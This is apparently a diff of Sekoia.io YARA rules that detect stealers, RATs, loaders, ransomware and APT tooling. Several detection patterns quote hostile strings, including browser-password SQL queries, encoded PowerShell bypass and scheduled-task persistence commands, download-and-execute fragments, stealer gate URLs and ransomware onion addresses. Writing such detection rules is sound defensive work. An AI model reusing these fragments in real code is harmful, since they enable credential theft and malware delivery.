+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d4a5338c502b145a1d7ad9f35779e24d66ee2d11bf760d498aab39e2c62fbeb4"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "feab7940559392bbf38f29267509340569160e0a3b257fd86e5c65ae087ea014"
-		hash2 = "c9d2c8b6011a53e68e4a6c6e51142cef3348951d0b379e49b1a65a1891538df5"
-		hash3 = "2f5be3773e7e3a2f6806cdef154adfabc454c0e57a49e437c5889ce09b739302"
-		hash4 = "5bf170c95ca0e2079653d694f783b5bcd38f274ea875f67f0b60db4ac552a66c"
-		hash5 = "6fad04c836bc923f12ebaec8d8fb0c7091b044bf6f5c97e36d7bf46b8494f978"
-		hash6 = "64fe964f342acca6d85d247c4f67503e4222a58dfc5c644dedc2006a4b356d39"
-		hash7 = "6e216b265ea391f71f2a609df995f36b9ba8b17c8859f6d8e4ce4a076d351efd"
-		hash8 = "70dcc03cde3dd5c5ec6a6a240190cfb51667aaba9c867e20281e8dfc43afa891"
-		hash9 = "5053390bde150b771f8efe344b692c6c5718ba9203a4b23f5323af1ee9060ff2"
-		hash10 = "089e4dfd8b25afe596eff05baae86156a4e3243c84faa15416cff31a5120e107"
-		hash11 = "37e096338a78cb06d6236cb5a04cf125f191871ded3c9421f08a37890a095eb8"
-		hash12 = "b90a2b0249407b271a5d849fe82cbf4e9a31c2c6259caf515c9be3897e327414"
-		hash13 = "8f4751ed22619b04009c4b85ec45c8140b570835ca4c638c9e6019e7b7eb66c7"
 
 	strings:
-		$chunk_1 = {
-        C7 85 ?? ?? ?? ?? ?? ?? ?? 00
-        C7 85 ?? ?? ?? ?? ?? ?? ?? 00
-        33 C0
-        EB 03
-        8D 49 00
-        8B 8C 85 ?? ?? ?? ??
-        3B 8C 85 ?? ?? ?? ??
-        }
-		$chunk_2 = {
-        C7 84 24 ?? ?? ?? ?? ?? ?? 0? 00
-        C7 84 24 ?? ?? ?? ?? ?? ?? 0? 00
-        33 C0
-        EB 0D
-        8D A4 24 00 00 00 00
-        8D 9B 00 00 00 00
-        8B 8C 84 ?? ?? ?? ??
-        3B 8C 84 ?? ?? ?? ??
-        }
-		$movs_zip_dir_start = { C7 45 ?? 5A 69 70 20 C7 45 ?? 44 69 72 20 C7 45 ?? 53 74 61 72  C7 45 ?? 74 20 2D 20}
+		$str01 = "POST /users/loginpage.html HTTP/1.1" ascii
+		$str02 = "pm3/apps/Insekt/main.go" ascii
+		$str03 = "generate new insekt err" ascii
+		$str04 = "[SHELLCODE][filesize]:[scan]" ascii
+		$str05 = "\\Device\\NamedPipe\\cygwinbad" ascii
+		$str06 = "pm3/utils.GetTmpDir" ascii
+		$str07 = "os/exec.Command" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 1MB and ( $chunk_1 or $chunk_2 ) and $movs_zip_dir_start
+		( uint16( 0 ) == 0x5A4D or uint32( 0 ) == 0x464C457F ) and 5 of them
 }
-rule SEKOIA_Ta410_Control_Flow_Obfuscation : FILE
+rule SEKOIA_Infostealer_Win_Meduzastealer : FILE
 {
 	meta:
-		description = "Detects control flow obfuscation used by TA410 in XXXModule_dlcore0"
+		description = "Finds MeduzaStealer samples based on specific strings"
 		author = "Sekoia.io"
-		id = "2a784f9b-3624-4c5d-8a64-db7d3c33a8f7"
-		date = "2022-10-11"
+		id = "1276f485-aa5d-491b-89d8-77f98dc496e1"
+		date = "2023-06-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ta410_control_flow_obfuscation.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "6cf78943728286d0bddd99049d81065673ab7f679029cdd5f5dc69f90197136e"
-		logic_hash = "3ee6ee07e7a7be285290ec91de649afff3e5dc222bcfc58709b642d4dd53dc41"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_meduzastealer.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e81a5a9611662422eb7a87c0c1a370cee6f138fd6169225d969b669337d91a06"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239448,30 +240267,33 @@ rule SEKOIA_Ta410_Control_Flow_Obfuscation : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$chunk_1 = {
-        E8 ?? ?? ?? ??
-        83 C0 10
-        3D 00 00 00 80
-        7D 01
-        EB ff
-        }
-		$chunk_2 = {83 C0 10 3D 00 00 00 80 7d 01 eb ff e0 50 c3 75}
+		$str01 = "emoji" ascii
+		$str02 = "%d-%m-%Y, %H:%M:%S" ascii
+		$str03 = "[UTC" ascii
+		$str04 = "user_name" ascii
+		$str05 = "computer_name" ascii
+		$str06 = "timezone" ascii
+		$str07 = "current_path()" ascii
+		$str08 = "[json.exception." ascii
+		$str09 = "GDI32.dll" ascii
+		$str10 = "GdipGetImageEncoders" ascii
+		$str11 = "GetGeoInfoA" ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 10MB and any of them
+		uint16( 0 ) == 0x5a4d and 8 of them and filesize > 500KB
 }
-rule SEKOIA_Rat_Win_Millenium : FILE
+rule SEKOIA_Generic_Tor_Hidden_Service_Leading_To_Winports : FILE
 {
 	meta:
-		description = "Finds MilleniumRAT samples based on the specific strings"
+		description = "Detects malicious TOR redirection affecting RDP, NetBios"
 		author = "Sekoia.io"
-		id = "91320924-5c74-457a-8601-29c4e4034761"
-		date = "2023-11-16"
+		id = "1e5c469b-f721-44af-87b3-1adf423719c1"
+		date = "2023-09-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_millenium.yar#L1-L30"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "bcf4158b9bfee65cd9bd74163ac108ea1de8ec0e9ad066e77bec788ae6fb7283"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_tor_hidden_service_leading_to_winports.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "39db199ba7fede8df4bdb505b071240dda96b74f66f818f90047dad338dc4a72"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239479,149 +240301,140 @@ rule SEKOIA_Rat_Win_Millenium : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Millenium RAT, version:" wide
-		$str02 = "Coded by @shinyenigma" wide
-		$str03 = "*gift*<NEW TOKEN>*<NEW CHAT ID>*<message> - gift this bot to another user, his telegram bot has to be started" wide
-		$str04 = "*historyForce - grab more browser history by killing browser processes, use carefully" wide
-		$str05 = "*download - victim`s PC downloads a file attached to this message, if it is a picture it should also be attached as a file" wide
-		$str06 = "No keylogs recorded!" wide
-		$str07 = "Successfully added RAT to startup" wide
-		$str08 = "You`ve gifted gifted a bot:" wide
-		$str09 = "Incorrect agrument, please enter 0/90/180/270" wide
-		$str10 = "SELECT action_url, username_value, password_value FROM logins" wide
-		$str11 = "Yandex\\YandexBrowser\\User Data\\Default" wide
-		$str12 = "Millenium-rat-CSharp (main project)" ascii
-		$str13 = "get_BatteryLifePercent" ascii
-		$str14 = "get_ExpirationMonth" ascii
-		$str15 = "sqlite3_extension_init " ascii
+		$s1 = "HiddenServiceDir "
+		$s2 = "SocksPort "
+		$s3 = "HiddenServicePort "
+		$s4 = ":3389"
+		$s5 = ":445"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of ( $str* )
+		$s1 and $s2 and ( $s4 in ( @s3 .. @s3 + 100 ) or $s5 in ( @s3 .. @s3 + 100 ) ) and filesize < 2000
 }
-rule SEKOIA_Hacktool_Gtunnel_Strings : FILE
+rule SEKOIA_Tool_Htran_Strings : FILE
 {
 	meta:
-		description = "Detects Go gTunnel based on strings"
+		description = "Detects HTran based on strings"
 		author = "Sekoia.io"
-		id = "f20a4400-8ae6-4954-b643-0a8847f037f0"
-		date = "2023-04-24"
+		id = "0184937e-eefa-4c6d-ae00-9b0af80dc7db"
+		date = "2022-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_gtunnel_strings.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "76a67f0487fea7b890863bef06a48f665b611f7659eb374cd83cd4be01b812ab"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_htran_strings.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6a414cec8ad623c735779b9005074f88b07d88b29b23918d98a541a2612a3fa0"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$repo = "github.com/hotnops/gTunnel/" ascii fullword
-		$s1 = "common.(*Tunnel).GetControlStream"
-		$s2 = "common.(*Tunnel).handleIngressCtrlMessages"
-		$s3 = "client..inittask"
-		$s4 = "client.file_client_proto_rawDescGZIP."
-		$s5 = "common.(*SocksServer).Start."
-		$s6 = "client.(*TunnelControlMessage).GetConnectionId"
-		$s7 = "protobuf/reflect/protoreflect.ProtoMessage"
+		$ = "-slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>"
+		$ = "-tran <ConnectPort> <TransmitHost> <TransmitPort>"
+		$ = "-listen <ConnectPort> <TransmitPort>"
+		$ = "[-] There is a error...Create a new connection."
+		$ = "[+] Start Transmit (%s:%d <-> %s:%d) ......"
+		$ = "[+] Accept a Client on port %d from %s"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0xfeedface or uint32be( 0 ) == 0xfeedfacf or uint32be( 0 ) == 0xcafebabe ) and #repo > 200 or 5 of ( $s* )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 3 of them
 }
-rule SEKOIA_Apt_Apt_K_47_Orpcbackdoor : FILE
+rule SEKOIA_Apt_Apt28_Document_Phishing_Webpage : FILE
 {
 	meta:
-		description = "Detects ORPCBackdoor used by APT-K-47"
+		description = "Detects APT28 document phishing webpage"
 		author = "Sekoia.io"
-		id = "9768371d-763f-45df-b727-ccda97501aaa"
-		date = "2024-02-14"
+		id = "585a8e23-c302-41d3-938f-eda60c82ef28"
+		date = "2024-04-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt_k_47_orpcbackdoor.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "4a05e68eca0954e3bca5ebec6c63bf0535051f8d99f65940b7ed00f49e659f2d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt28_document_phishing_webpage.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b64888c1d8568cf9d8f4dfcd2e18093db8635966d88abaa368dc46a1e4453782"
 		score = 75
-		quality = 55
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "RegisteredOrganization:\t\t\t" ascii wide
-		$s2 = "To Be Filled By O.E.M" ascii wide
-		$s3 = ">> "
-		$s4 = "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\%u" wide
-		$s5 = "Error! GetSystemDirectory failed."
-		$s6 = "Domain:\t\t\t\t"
+		$ = "webhook.site"
+		$ = "document.createElement('img')"
+		$ = "brightness(15%) blur(7.0px)"
+		$ = "This document is not available from mobile devices."
+		$ = "Capture2.PNG"
+		$ = ">CLICK TO VIEW DOCUMENT<"
+		$ = "window.location.href = 's"
+		$ = ".oast."
 
 	condition:
-		all of them and filesize < 300KB and uint16be( 0 ) == 0x4d5a
+		4 of them and filesize < 20KB
 }
-rule SEKOIA_Win_Clipper_Generic : FILE
+rule SEKOIA_Water_Sigbin_Group
 {
 	meta:
-		description = "Clipper found during investigation: 892a9edb03db3fd88fecc1e1a2f56a7339f16f6734e8d77e6538ea2c8c9026d6"
+		description = "Detects IOCs related to the 8220 Mining group."
 		author = "Sekoia.io"
-		id = "a94b3d01-dbc7-41e4-8d45-793bf443b1d2"
-		date = "2024-07-03"
+		id = "c49728e8-db7e-4d83-97d2-7d56b51f8a52"
+		date = "2024-06-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/win_clipper_generic.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f2fb2285adb10269aaf3d028d3803775ad86833b36cf24dabb8d404a6380b505"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/water_sigbin_group.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "dd51945bf79e37b50d377eda3641eb32438dcb5a1c55fb4a9b66a5b5a8b5ed0d"
 		score = 75
-		quality = 78
-		tags = "FILE"
+		quality = 80
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s = { 24 72 61 6e 70 74 68 20 3d 20 69 66 20 28 28 47 65 74 2d 52 61 6e 64 6f 6d 29 20 25 20 32 29 20 7b 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 54 45 4d 50 20 22 24 72 61 6e 2e 70 73 31 22 20 7d 20 65 6c 73 65 20 7b 20 4a 6f 69 6e 2d 50 61 74 68 20 24 65 6e 76 3a 41 50 50 44 41 54 41 20 22 24 72 61 6e 2e 70 73 31 22 20 7d  }
+		$s1 = "Z12A3" ascii fullword
+		$s2 = "FromBase64String" ascii fullword
+		$s3 = "Start-Process" ascii fullword
+		$s4 = "WriteAllBytes" ascii fullword
 
 	condition:
-		filesize > 1KB and all of them
+		all of them
 }
-rule SEKOIA_Apt_Apt41_Powershell_Collection_Script : FILE
+rule SEKOIA_Apt_Kimsuky_Vbs_Powershell_Downloader : FILE
 {
 	meta:
-		description = "Detects PowerShell collection script"
+		description = "Detects VBS/Powershell Downloader used by Kimsuky"
 		author = "Sekoia.io"
-		id = "55b6cc3e-24b2-4faa-a7fb-b4203a8e6d83"
-		date = "2023-11-15"
+		id = "4c9af11f-802b-4ffe-9783-90fc2ee53809"
+		date = "2022-08-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_apt41_powershell_collection_script.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8b0462636c9f6270baff2bf09638e94db6d5a0472b8216ddd1919a77b6a63aca"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_vbs_powershell_downloader.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "dc24ca206a3122b34be978287f907b12c809f76058fe9355bbd00b3159b0a4d4"
 		score = 75
-		quality = 70
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "$yestoday.ToString(" ascii wide nocase
-		$ = "$m.LastAccessTime -" ascii wide nocase
-		$ = "$fmat=" ascii wide nocase
-		$ = "$computername" ascii wide nocase
-		$ = "Rar.exe" ascii wide nocase
+		$ = "& WScript.ScriptFullName &" ascii fullword
+		$ = "/c schtasks /create /sc minute /mo 5 /tn"
+		$ = "pOwErsHeLl -ep bypass -encodedCommand"
 
 	condition:
-		filesize < 10KB and all of them
+		filesize < 200KB and 2 of them
 }
-rule SEKOIA_Loader_Amadey_Stealer_Plugin : FILE
+rule SEKOIA_Loader_Fakebat_Powershell_Fingerprint_May24 : FILE
 {
 	meta:
-		description = "Finds Amadey's stealer plugin based on characteristic strings"
+		description = "Finds FakeBat PowerShell script fingerprinting the infected host."
 		author = "Sekoia.io"
-		id = "50154e39-98b3-40e5-8986-18bbb7b15647"
-		date = "2023-05-16"
+		id = "7efcf9cf-78fe-400e-abe3-6955c394e358"
+		date = "2024-06-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/loader_amadey_stealer_plugin.yar#L1-L27"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0410492f9424797b670a14f43ce063458e59d7958e213c07c3d488a40bf370e6"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_fakebat_powershell_fingerprint_may24.yar#L1-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "04e5c888e5f71873c4fa2d732fbd8e40be3edf406300e65e489e1fa378028c5f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239629,61 +240442,62 @@ rule SEKOIA_Loader_Amadey_Stealer_Plugin : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "STEALERDLL.dll" ascii
-		$str02 = "?wal=1" fullword ascii
-		$str03 = "Content-Disposition: form-data; name=\"data\"; filename=\"" ascii
-		$str04 = "tar.exe -cf \"" ascii
-		$str05 = "SELECT origin_url, username_value, password_value FROM logins" ascii
-		$str06 = "\\Google\\Chrome\\User Data\\Default\\Login Data" ascii
-		$str07 = "\\SputnikLab\\Sputnik\\User Data\\Default\\Login Data" ascii
-		$str08 = "\\Mozilla\\Firefox\\Profiles\\" ascii
-		$str09 = "\"hostname\":\"([^\"]+)\"" ascii
-		$str10 = "\"encryptedUsername\":\"([^\"]+)\"" ascii
-		$str11 = "\"encryptedPassword\":\"([^\"]+)\"" ascii
-		$str12 = "&cred=" fullword ascii
-		$str13 = "D:\\Mktmp\\Amadey\\StealerDLL\\x64\\Release\\STEALERDLL.pdb" ascii
+		$str01 = "Get-WmiObject Win32_ComputerSystem" ascii
+		$str02 = "-Class AntiVirusProduct" ascii
+		$str03 = "status = \"start\"" ascii
+		$str04 = " | ConvertTo-Json" ascii
+		$str05 = ".FromXmlString(" ascii
+		$str06 = " = Invoke-RestMethod -Uri " ascii
+		$str07 = ".Exception.Response.StatusCode -eq 'ServiceUnavailable'" ascii
+		$str08 = "Invoke-WebRequest -Uri $url -OutFile " ascii
+		$str09 = "--batch --yes --passphrase-fd" ascii
+		$str10 = "--decrypt --output" ascii
+		$str11 = "Invoke-Expression \"tar --extract --file=" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 7 of them
+		7 of them and filesize < 10KB and true
 }
-rule SEKOIA_Apt_Kimsuky_Sharptongue_Vbslauncher_Strings : FILE
+rule SEKOIA_Ransomware_Lin_Avoslocker_Strings : FILE
 {
 	meta:
-		description = "Detects VBS Launchers used by SharpTongue"
+		description = "Detect AvosLocker ransomware for Linux by using strings from its ransom note and the onion domains"
 		author = "Sekoia.io"
-		id = "82bd648c-2961-4945-950e-8fb1e4650338"
-		date = "2022-07-29"
+		id = "6056e15c-d656-41cb-bea0-704776c52c92"
+		date = "2022-02-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_sharptongue_vbslauncher_strings.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9e1383a71b4ab5ca1de5016061f0e9c83e6f3e1a41eef25dae15cd1aab8b581f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_lin_avoslocker_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b65cf6713027644de281f17a4c5c170fc09a154e7119d04a92aceed0e2d7e4fd"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "0cd7b6ea8857ce827180342a1c955e79c3336a6cf2000244e5cfd4279c5fc1b6"
+		hash2 = "7c935dcd672c4854495f41008120288e8e1c144089f1f06a23bd0a0f52a544b1"
+		hash3 = "10ab76cd6d6b50d26fde5fe54e8d80fceeb744de8dbafddff470939fac6a98c4"
 
 	strings:
-		$ = "powershell" ascii wide
-		$ = "On Error Resume Next" ascii wide
-		$ = "oShell.run(tmp0,0" ascii wide
+		$s1 = "The corporations whom don't pay or fail to respond in a swift manner can be found in our blog, accessible at" ascii
+		$s2 = "http://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion" ascii
+		$s3 = "http://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion" ascii
 
 	condition:
-		all of them and filesize < 10KB
+		uint32( 0 ) == 0x464c457f and all of them
 }
-rule SEKOIA_Infostealer_Win_Xehook_Str : FILE
+rule SEKOIA_Guloader_Unpacker : FILE
 {
 	meta:
-		description = "Finds XehookStealer standalone samples based on specific strings."
+		description = "GuLoader Unpacker"
 		author = "Sekoia.io"
-		id = "fa76988d-f0a2-4fc2-a122-c104fd585f34"
-		date = "2024-06-12"
+		id = "dee4cad4-e3b4-4a12-860b-ff750b119fa8"
+		date = "2024-02-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_xehook_str.yar#L1-L32"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "543ec3b523e5f00d3c285e453c8d11f3d5c7778b2986b7fe03f2d62ff18c2778"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/guloader_unpacker.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6be9d7fa829480466aef2a7e78a7dadfac92f7774ab3374254305040c105496f"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239691,39 +240505,25 @@ rule SEKOIA_Infostealer_Win_Xehook_Str : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "xehook" ascii
-		$str02 = "Classes.LogRecord" ascii
-		$str03 = "__  _____| |__   ___   ___ | | __" wide
-		$str04 = "\\ \\/ / _ \\ '_ \\ / _ \\ / _ \\| |/ /" wide
-		$str05 = " >  <  __/ | | | (_) | (_) |   <" wide
-		$str06 = "/_/\\_\\___|_| |_|\\___/ \\___/|_|\\_\\" wide
-		$str07 = "https://t.me/xehook" wide
-		$str08 = "About PC.txt" wide
-		$str09 = "Browser: {4} v{5} ({6})" wide
-		$str10 = "http://ip-api.com/json/?fields=11827" wide
-		$str11 = "{0}gate.php?id={1}&build={2}&passwords={3}&cookies={4}" wide
-		$str12 = "getjson.php?id=" wide
-		$com01 = "CheckRemoteDebuggerPresent" ascii
-		$com02 = "get_CurrentThread" ascii
-		$com03 = "get_InstalledInputLanguages" ascii
-		$com04 = "get_Ticks" ascii
-		$com05 = "System.Security.Cryptography" ascii
+		$p1 = "([Parameter(Position = 0)] [Type[]] $" base64
+		$p2 = "+=2){" base64
+		$p3 = "}else {" base64
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of ( $str* ) and 4 of ( $com* )
+		$p1 in ( filesize -30000 .. filesize ) and $p2 in ( filesize -30000 .. filesize ) and $p3 in ( filesize -30000 .. filesize ) and filesize > 300KB
 }
-rule SEKOIA_Implant_Macos_Geacon : FILE
+rule SEKOIA_Apt_Sidecopy_Actionrat_Packer_Strings : FILE
 {
 	meta:
-		description = "Finds Geacon samples based on specific strings"
+		description = "Detects SideCopy's ActionRAT (packer?)"
 		author = "Sekoia.io"
-		id = "a7784bfa-66a7-47df-b88b-d98217d8cca5"
-		date = "2024-01-11"
+		id = "b9370bd5-12e1-448e-a5b1-2acc72adc4a7"
+		date = "2023-05-11"
 		modified = "2024-12-19"
-		reference = "https://www.sentinelone.com/blog/geacon-brings-cobalt-strike-capabilities-to-macos-threat-actors/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_macos_geacon.yar#L1-L35"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "284574d185d3777a373f4a19e0870eec5245fb8ea5ebd6124bc281f8c74e0998"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_sidecopy_actionrat_packer_strings.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "1bb6896ac3efa0e43cc27f56d7324ab9bdd2c401941eeefc4e7be62b407657af"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -239731,142 +240531,105 @@ rule SEKOIA_Implant_Macos_Geacon : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$gea01 = "geacon/config.init" ascii
-		$gea02 = "geacon_pro-master/config/config.go" ascii
-		$gea03 = "geacon_plus-main/config/config.go" ascii
-		$gea04 = "command type %d is not support by geacon now" ascii
-		$gea05 = "main/sysinfo.GeaconID" ascii
-		$str01 = "command.StealToken" ascii
-		$str02 = "command.MakeToken" ascii
-		$str03 = "command/misc.go" ascii
-		$str04 = "config/c2profile.go" ascii
-		$str05 = "crypt.AesCBCDecrypt" ascii
-		$str06 = "packet.File_Browse" ascii
-		$str07 = "packet.FirstBlood" ascii
-		$str08 = "packet.ParseCommandShell" ascii
-		$str09 = "packet.ParseCommandUpload" ascii
-		$str10 = "packet.PushResult" ascii
-		$str11 = "sysinfo.GetComputerName" ascii
-		$str12 = "sysinfo.IsOSX64" ascii
-		$str13 = "util..inittask" ascii
+		$ = "(HTTP/1\\.[01]) (\\d{3})(?: (.*?))?"
+		$ = "cpp-httplib/0.7"
+		$ = "\\HTTP Arsanel\\"
 
 	condition:
-		uint32( 0 ) == 0xFEEDFACF and ( ( 1 of ( $gea* ) and 2 of ( $str* ) ) or 8 of ( $str* ) )
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
 }
 
-rule SEKOIA_Implant_Win_Magicrat : FILE
+rule SEKOIA_Implant_Win_Mysterysnail : FILE
 {
 	meta:
-		description = "Detect Lazarus' MagicRAT"
+		description = "Detect the MysterySnail using section hashes"
 		author = "Sekoia.io"
-		id = "74973682-b214-48ee-98c3-f4b6bef76587"
-		date = "2022-09-13"
+		id = "dfd2eba8-eb9c-411a-b5e0-663593453e3d"
+		date = "2021-10-13"
 		modified = "2024-12-19"
-		reference = "https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/implant_win_magicrat.yar#L4-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9abc223c5ae9300b06b9161cbd9f5a501b6aaf46970b0bb74d98168792b7e659"
+		reference = "https://github.com/SEKOIA-IO/Community"
